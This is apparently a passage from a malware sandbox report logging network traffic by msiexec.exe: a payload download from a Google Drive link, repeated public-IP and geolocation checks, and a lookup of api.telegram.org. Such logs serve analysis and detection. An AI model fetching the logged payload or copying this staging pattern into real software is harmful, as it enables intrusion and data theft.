                                                                                              Oct 24, 2024 12:03:22.783020020 CEST8.8.8.8192.168.2.220x992fNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:22.783020020 CEST8.8.8.8192.168.2.220x992fNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:22.783020020 CEST8.8.8.8192.168.2.220x992fNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:22.783020020 CEST8.8.8.8192.168.2.220x992fNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:22.783020020 CEST8.8.8.8192.168.2.220x992fNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:22.783020020 CEST8.8.8.8192.168.2.220x992fNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:22.794996977 CEST8.8.8.8192.168.2.220xa66aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:22.794996977 CEST8.8.8.8192.168.2.220xa66aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:22.794996977 CEST8.8.8.8192.168.2.220xa66aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:22.794996977 CEST8.8.8.8192.168.2.220xa66aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:22.794996977 CEST8.8.8.8192.168.2.220xa66aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:22.794996977 CEST8.8.8.8192.168.2.220xa66aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:23.478737116 CEST8.8.8.8192.168.2.220xfbfNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:23.478737116 CEST8.8.8.8192.168.2.220xfbfNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:24.293239117 CEST8.8.8.8192.168.2.220xa178No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                              • drive.google.com
                                                                                              • drive.usercontent.google.com
                                                                                              • reallyfreegeoip.org
                                                                                              • api.telegram.org
                                                                                              • checkip.dyndns.org
                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.2249164193.122.130.0802504C:\Windows\SysWOW64\msiexec.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 12:03:08.738343954 CEST151OUTGET / HTTP/1.1
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                              Host: checkip.dyndns.org
                                                                                              Connection: Keep-Alive
                                                                                              Oct 24, 2024 12:03:09.399804115 CEST323INHTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 10:03:09 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 106
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              X-Request-ID: 50c8f51ef814c227c07b8913dd366877
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>
                                                                                              Oct 24, 2024 12:03:09.412684917 CEST127OUTGET / HTTP/1.1
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                              Host: checkip.dyndns.org
                                                                                              Oct 24, 2024 12:03:09.570429087 CEST323INHTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 10:03:09 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 106
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              X-Request-ID: 0cf25e4150b83859a4fec54309de4212
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>
                                                                                              Oct 24, 2024 12:03:09.780051947 CEST323INHTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 10:03:09 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 106
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              X-Request-ID: 0cf25e4150b83859a4fec54309de4212
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>
                                                                                              Oct 24, 2024 12:03:10.559598923 CEST127OUTGET / HTTP/1.1
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                              Host: checkip.dyndns.org
                                                                                              Oct 24, 2024 12:03:10.741102934 CEST323INHTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 10:03:10 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 106
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              X-Request-ID: 682899a9c3b464f6df0865ab2bd2dcd0
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>
                                                                                              Oct 24, 2024 12:03:10.952076912 CEST323INHTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 10:03:10 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 106
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              X-Request-ID: 682899a9c3b464f6df0865ab2bd2dcd0
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.2249167132.226.8.169802504C:\Windows\SysWOW64\msiexec.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 12:03:11.569566011 CEST127OUTGET / HTTP/1.1
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                              Host: checkip.dyndns.org
                                                                                              Oct 24, 2024 12:03:12.638803959 CEST275INHTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 10:03:12 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 106
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>
                                                                                              Oct 24, 2024 12:03:12.849598885 CEST275INHTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 10:03:12 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 106
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.2249169132.226.247.73802504C:\Windows\SysWOW64\msiexec.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 12:03:13.462949991 CEST151OUTGET / HTTP/1.1
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                              Host: checkip.dyndns.org
                                                                                              Connection: Keep-Alive
                                                                                              Oct 24, 2024 12:03:14.334742069 CEST323INHTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 10:03:14 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 106
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              X-Request-ID: d1181754a9f33e6d3c42c0ce32a40c4e
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>
                                                                                              Oct 24, 2024 12:03:14.544008017 CEST323INHTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 10:03:14 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 106
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              X-Request-ID: d1181754a9f33e6d3c42c0ce32a40c4e
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.2249171132.226.247.73802504C:\Windows\SysWOW64\msiexec.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 12:03:15.807598114 CEST151OUTGET / HTTP/1.1
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                              Host: checkip.dyndns.org
                                                                                              Connection: Keep-Alive
                                                                                              Oct 24, 2024 12:03:16.661395073 CEST323INHTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 10:03:16 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 106
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              X-Request-ID: 8f799886e611909c812942812c6a9e16
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>
                                                                                              Oct 24, 2024 12:03:16.869441986 CEST323INHTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 10:03:16 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 106
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              X-Request-ID: 8f799886e611909c812942812c6a9e16
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              4192.168.2.2249173132.226.247.73802504C:\Windows\SysWOW64\msiexec.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 12:03:17.462455988 CEST151OUTGET / HTTP/1.1
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                              Host: checkip.dyndns.org
                                                                                              Connection: Keep-Alive
                                                                                              Oct 24, 2024 12:03:18.342772961 CEST323INHTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 10:03:18 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 106
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              X-Request-ID: ca3ffcb9848ab85a966a8fc167b73760
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>
                                                                                              Oct 24, 2024 12:03:18.552324057 CEST323INHTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 10:03:18 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 106
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              X-Request-ID: ca3ffcb9848ab85a966a8fc167b73760
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              5192.168.2.2249175193.122.130.0802504C:\Windows\SysWOW64\msiexec.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 12:03:19.267075062 CEST151OUTGET / HTTP/1.1
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                              Host: checkip.dyndns.org
                                                                                              Connection: Keep-Alive
                                                                                              Oct 24, 2024 12:03:19.920361996 CEST323INHTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 10:03:19 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 106
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              X-Request-ID: 3958074e240bc16ff7f43bcf0b8749ff
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              6192.168.2.2249177132.226.247.73802504C:\Windows\SysWOW64\msiexec.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 12:03:21.117177963 CEST151OUTGET / HTTP/1.1
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                              Host: checkip.dyndns.org
                                                                                              Connection: Keep-Alive
                                                                                              Oct 24, 2024 12:03:21.980623960 CEST323INHTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 10:03:21 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 106
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              X-Request-ID: 20ade64835a3f442f43ce209fc90f640
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>
                                                                                              Oct 24, 2024 12:03:22.188254118 CEST323INHTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 10:03:21 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 106
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              X-Request-ID: 20ade64835a3f442f43ce209fc90f640
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              7192.168.2.2249179193.122.130.0802504C:\Windows\SysWOW64\msiexec.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 12:03:22.806312084 CEST151OUTGET / HTTP/1.1
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                              Host: checkip.dyndns.org
                                                                                              Connection: Keep-Alive
                                                                                              Oct 24, 2024 12:03:23.459506035 CEST323INHTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 10:03:23 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 106
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              X-Request-ID: 3f9dd7fe586357413bba6fe77d94a652
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.2249162142.250.186.1424432504C:\Windows\SysWOW64\msiexec.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-10-24 10:03:03 UTC216OUTGET /uc?export=download&id=1UdCocYDXIneNm0wsl0RKLwjEdjKNc8DS HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              2024-10-24 10:03:03 UTC1610INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 24 Oct 2024 10:03:03 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1UdCocYDXIneNm0wsl0RKLwjEdjKNc8DS&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: script-src 'nonce-lx5qCDiX1sJH5qpUFOMDFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.2249163142.250.186.974432504C:\Windows\SysWOW64\msiexec.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-10-24 10:03:04 UTC258OUTGET /download?id=1UdCocYDXIneNm0wsl0RKLwjEdjKNc8DS&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              2024-10-24 10:03:06 UTC4917INHTTP/1.1 200 OK
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Security-Policy: sandbox
                                                                                              Content-Security-Policy: default-src 'none'
                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                              X-Content-Security-Policy: sandbox
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Cross-Origin-Embedder-Policy: require-corp
                                                                                              Cross-Origin-Resource-Policy: same-site
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Content-Disposition: attachment; filename="DGABECTh192.bin"
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Access-Control-Allow-Credentials: false
                                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 275008
                                                                                              Last-Modified: Wed, 23 Oct 2024 10:38:06 GMT
                                                                                              X-GUploader-UploadID: AHmUCY3RUEPBPqOgWG8Umz56MG7PlGMimGE6acPN7IYpNlA9CPAsg_D9BgpGg8qwkQcrqo9eK2Z-HrV--A
                                                                                              Date: Thu, 24 Oct 2024 10:03:06 GMT
                                                                                              Expires: Thu, 24 Oct 2024 10:03:06 GMT
                                                                                              Cache-Control: private, max-age=0
